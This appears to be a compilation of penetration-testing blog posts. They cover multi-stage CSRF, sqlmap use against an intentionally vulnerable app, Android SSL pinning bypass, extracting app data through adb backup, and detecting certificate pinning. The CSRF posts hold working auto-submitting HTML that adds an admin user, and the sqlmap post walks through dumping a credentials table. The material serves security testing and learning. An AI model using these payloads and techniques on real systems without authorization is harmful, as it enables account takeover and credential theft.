Multi Stage CSRF attack

Some times while testing for a CSRF vulnerability, we come across scenario where to perform a certain action, more than one form needs to be filled up or multiple different requests needs to be fired before we can actually complete a action successfully. This scenario is also vulnerable to CSRF attack given that certain conditions are met. The obvious conditions in case of successful CSRF attack are:

• The victim user should be logged into the victim site using a browser.
• The attacking request should be opened on the same browser on which the user is logged in the victim site.
• The attacker should know all the parameters of the request which performs a certain action.

For successful multi stage CSRF attack, following additional thing is required:

• The subsequent requests should not depend on any values received from the previous responses.

For explanation purpose, we'll consider a 2 stage CSRF attack where two subsequent requests are required to complete a action.

Consider a case where admin can add a user to the application. The action flow is as follows:

• The action works in 2 stages. First, a request to add user is sent with parameters 'action=add' and 'user=<username>'.
• Then a confirmation for user addition is asked by the server. Hence a second request needs to be sent with parameter 'confirm=true'. 
• Without the submission of second request, the user addition would not be possible. Hence, a single stage CSRF attack wont work.

CSRF attack for the above case can performed using the below code which contains both the required requests.

Code:
<html>

<form name="testform2" method="POST" action="http://localhost/confirm.php">
<input type="hidden" name="confirm" value="true" />
</form>

<script type="text/javascript">

 window.setTimeout(SubmitTestform, 4000);

 function SubmitTestform()

 {

  document.testform2.submit();

 }

</script>

<form name="testform1" method="POST" action="http://localhost/useradd.php">
<input type="hidden" name="action" value="add" />

<input type="hidden" name="user" value="new_admin" />
</form>

<script type="text/javascript">
document.testform1.submit();
</script>
<html>

The above code causes a delay of 4 seconds between the first request to 'useradd.php' and second request to 'confirm.php'.

In the same way above, you can modify the above code with your own requests.

For more than 2 stages, the above code can be used with incremental delays after each request, the last request being at the top of the code and the first being at the bottom.

Example code for 3 stage CSRF:

<html>
<form name="testform2" method="POST" action="http://localhost/confirm2.php">
<input type="hidden" name="confirm2" value="true" />
</form>
<script type="text/javascript">
 window.setTimeout(SubmitTestform2, 4000);
 function SubmitTestform2()
 {
  document.testform2.submit();
 }
</script>

<form name="testform1" method="POST" action="http://localhost/confirm.php">
<input type="hidden" name="confirm" value="true" />
</form>
<script type="text/javascript">
 window.setTimeout(SubmitTestform1, 2000);
 function SubmitTestform1()
 {
  document.testform1.submit();
 }
</script>

<form name="testform" method="POST" action="http://localhost/useradd.php">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="user" value="new_admin" />
</form>
<script type="text/javascript">
document.testform.submit();
</script>
</html>

Tags: Multi-stage CSRF, two stage CSRF, 2 stage CSRF, multi stage CSRF.

How to use Sqlmap

Sqlmap is automated sql injection detection and exploitation tool written in python. It is very easy to use, straight forward tool to exploit sql injection in Relation Databases. Sqlmap supports variety of DBMS including the most popular ones: Mysql, Oracle, MSSql. The salient features of Sqlmap are:

• Detecting sql injection
• Dump data from databases
• running arbitrary sql commands through it sql shell feature
• running arbitrary OS commands through its OS shell feature

Requirements:

• Python
• Sqlmap

Sqlmap is simple to run. Before doing it practically lets see the most basic and important commands that are required for using sqlmap.

• -r <REQUESTFILE>: Load HTTP request from a file(can be used for both GET and POST methods)
• -u <URL>, --url=<URL>   Target URL (e.g. "http://www.site.com/vuln.php?id=1") (For POST request, this needs to used in combination with --data option)
• --level=<level>: Level of tests to perform (1-5, default 1)
• --risk=<risk>: Risk of tests to perform (1-3, default 1) (for detection keep it 1 and for exploitation, keep it 3)
• --dump: This option is used to dump data from a given database or table. (database is provided by -D <database> and table is provided by -T <table>
• --dump-all: This option is used to dump data of everything (database and table) Sqlmap finds.
• --dbs: To enumerate databases
• --tables: To enumerate tables for a given database(provided using -D). If '-D' option is not provided, current database is default.

For more options, you can refer the sqlmap help by typing:

python sqlmap.py --help

Lets start using Sqlmap. For this demo, I have used a freely available, intentionally vulnerable web app called mutillidae which can be run locally using apache for learning purpose. Its code can be found here.

The page shown below takes username and password as input and shows the user details if both, username and password, are correct.

The request going to the server hosted on the localhost is shown below using burp proxy. Here the parameters username and password within the query string are vulnerable to sql injection. We'll use username parameter for sql injection detection and exploitation using sqlmap.

To run sqlmap, open command prompt or terminal, go to the folder where sqlmap code is extracted and the commands.

To check if username name parameter is vulnerable to sql injection, we need to specify the following things:

• -u: Full url of the web app page to test
• -p: Parameter in the query string or in the request body to be tested
• --data: If POST method is used, specify the request body data here

Sqlmap has determined that the parameter username is vulnerable to sql injection and also enumerated the backend database among other information. Here, Mysql of version 5.0.12 is being used.

Once we have identified that the parameter username is vulnerable, lets specify additionally the dbms as Mysql using option "--dbms=Mysql" and tell sqlmap to enumerate all the databases using option "--dbs". Specifying the dbms, if you know, speeds thing up by not trying payloads of other dbms.

Sqlmap has successfully enumerated the list of databases in the current dbms as shown below.

We'll enumerate the nowasp database and specify the same to Sqlmap using option "-D <database-name>". We'll tell Sqlmap to enumerate tables in nowasp database using option "--tables".

Below screenshot shows the tables from nowasp database.

Looking at the list of tables, it looks like the table accounts may contain sensitive data. We'll try to dump all the data of that table. To tell sqlmap which table's data to be extracted, use "-T <tablename>". Use "--dump" to dump data of the specified table(-T) from the specified database(-D).

As you can see, sqlmap has successfully dumped the data of the table accounts which contains the user credentials.

For POST method, a more feasible way of running sqlmap is using the "-r" option. Store the whole request containing vulnerable parameter inside a file, example shown below, and call the file. The request can be taken from the burpsuite history.

Example command for the same attack shown above is:

python sqlmap.py -r <request-file-name> -p username

Note: The post is only for learning purpose only. Do not perform testing where you are not authorized to.

Tags: sql injection using sqlmap, sqlmap basic, learn sqlmap.

Bypass SSL Certificate or public key pinning implemented in Android mobile application

Hi folks,

Some times during application testing in Android platform, we come across a application which implements SSL (Certificate or public key) pinning. Hence, making it difficult to intercept the traffic using Web proxy during testing.

This post lists down tools already available on the internet for bypassing SSL pinning without touching the application code.

Prerequisites before using the tools:

• The mobile must be rooted.
• The tools used to bypass SSL pinning must be given Super User access/privilege.
• The CA certificate of the intercepting Web proxy must be installed in the mobile Certificate store.

Tools list for applications running on android platform version <=4.3:

1. Cydia Substrate
2. Android SSL Trust Killer

As Cydia Subtrate is no longer supported for versions 4.4(KitKat) and above, below tools can be used for SSL pinning bypass in Android version 4.4 and above.

1. Exposed Framework
2. JustTrustMe

Download and install the apks as per your mobile's android version. Once installed, activate the modules (Android-SSL-Trust-Killer/JustTrustMe) in Cydia-Subtrate/Exposed-Framework and restart the mobile. Now, if everything is configured properly, you can successfully intercept the application traffic.

Extract local storage data of mobile application on non rooted Android devices

This post covers how to extract or get locally stored data of a application on Android devices which is not rooted. In Mobile Appsec, we have to check for  vulnerabilities related locally stored data. For rooted mobiles, it is quite straight forward. We can use even a file manager to dump data.

But for non rooted mobiles, is that not straight forward. Access to /data/data/ , where all the installed applications are, is restricted.

The two ways to extract local data of the application that I know of is:

• Using backup tools
• Using adb (This method uses application backup to extract local data)

I'll be showing how to extract local application data using adb.

I have installed IGLearner application in my mobile for this demo.

Lets start:

Step 1: Set the mobile in debugging mode and connect it to laptop/Computer.

Step 2: Open command prompt and go the folder where adb is present.

Step 3: Before running the actual command, check if your mobile is properly connected by running the command:

adb devices

If your device is listed as  above, move to next step. Otherwise, check your cable or debugging mode is enabled properly.

Step 4: Run the following command to initiate application backup:

adb backup -f <filename>.ab -noapk <package name>

-noapk instruct only to back up local data excluding apk file.

<package name> This is name which the application is stored in /data/data folder. This can be obtained in AndroidManifest.xml file of the application as shown below.

Note: A prompt for backing up the data will be poped up in the mobile as shown below. Do not enter any password. Tap on 'BACKUP MY DATA'.

Step 5: After running the command, the file is stored in the same folder as of adb. Mine is named as data.ab. The backup data is in encoded format. This needs to be decoded.

Step 6: To decode the data, start a linux box (I have set it up on VM). Ensure that 'dd' and 'openssl' packages are installed on it. Copy the backup file on Linux box and in  terminal, go to the folder where the backup file copied and run the following command:

dd if=<backup_filename_with_extension> bs=24 skip=1|openssl zlib -d > data.tar

Note: If you get any error while running this command, repeat the Step 4 again and run this command on new backup file.

Step 7: The data is now decoded stored as tar ball. Extract the tar ball and now you have got the locally stored data of the application,

Step 8: I have found user credentials stored in one of the dbs that were stored locally by the application. This was obtained in the data obtained using above method.

Hope this assist in your testing. Happy testing.

Mobile: Identify SSL pinning in mobile application

Hi Friends,

Today we are going to see how to identify whether a mobile application is using certificate pinning or not for communication using https with its server on internet. This is applicable to all platforms (Android, IOS, etc..).

So lets start...

Requirements:
1. A mobile.
2. A Desktop or laptop with a proxy tool. I am using Fiddler as proxy tool.
3. A internet wifi connection.

Step 1: Install the application to be tested for Certificate Pinning on the Mobile.

Step 2: Start the Fiddler proxy on the Desktop/Laptop and configure it to listen on a particular port. I this demo, I am using port 8080.

Step 3: Configure the Desktop's/Laptop's ip address and port 8080 as proxy in wifi settings of the mobile. To see how to configure proxy in android, click here.

Step 4: Set Fiddler in non-decrypting mode, i.e. Fiddler wont decrypt any SSL traffic but will act as a passive proxy.

Step 5: Test that the fiddler proxy on Desktop/Laptop is capturing the traffic from the mobile by browsing any site on the mobile's browser.

Step 6: Set Fiddler in decrypting mode, i.e. set Fiddler to act as active proxy and decrypt SSL traffic of https sites also.

Step 7: Export the fiddler certificate.

Step 8: Install it on the mobile. This ensures that the fiddler certificate is trusted by the application as it is in the trusted store of the Mobile. To install CA certificate in Android: Settings > Security > Install from Storage > Locate the certificate and install it.

Step 9: Browse and https site inside the mobile browser and ensure that no certificate error is produced. If certificate error is produced, the mobile browser is not trusting our installed CA certificate. In this case, restart the mobile. If no error occurs, move on to next step.

Step 10: Set Fiddler in non-decrypting mode.

Step 11: Open the application under test. The application would be able to communicate with its server on internet. Browse through its features. Only connect requests would be seen in Fiddler and no data due to its acting as passive proxy. If the application does not work after setting the proxy in Wifi settings, then the application may be detecting proxy and does not work on proxy detection. I'll explain proxy detection bypass in the next blog.

Step 12: This step determines whether the application is using SSL pinning or not. Set Fiddler in decrypting mode again. Open the application under test. If the application opens up properly and traffic is captured in Fiddler, no SSL pinning is implemented. If SSL pinning is implemented in the application, the application will throw error such as 'Cannot connect to the server','Check the Network' and wont open or go further.

Hope the above troubleshooting helps in Mobile Security Testing. To explain SSL pinning bypass would require another tutorial itself, I'll cover that in next blog.

Happy Testing :)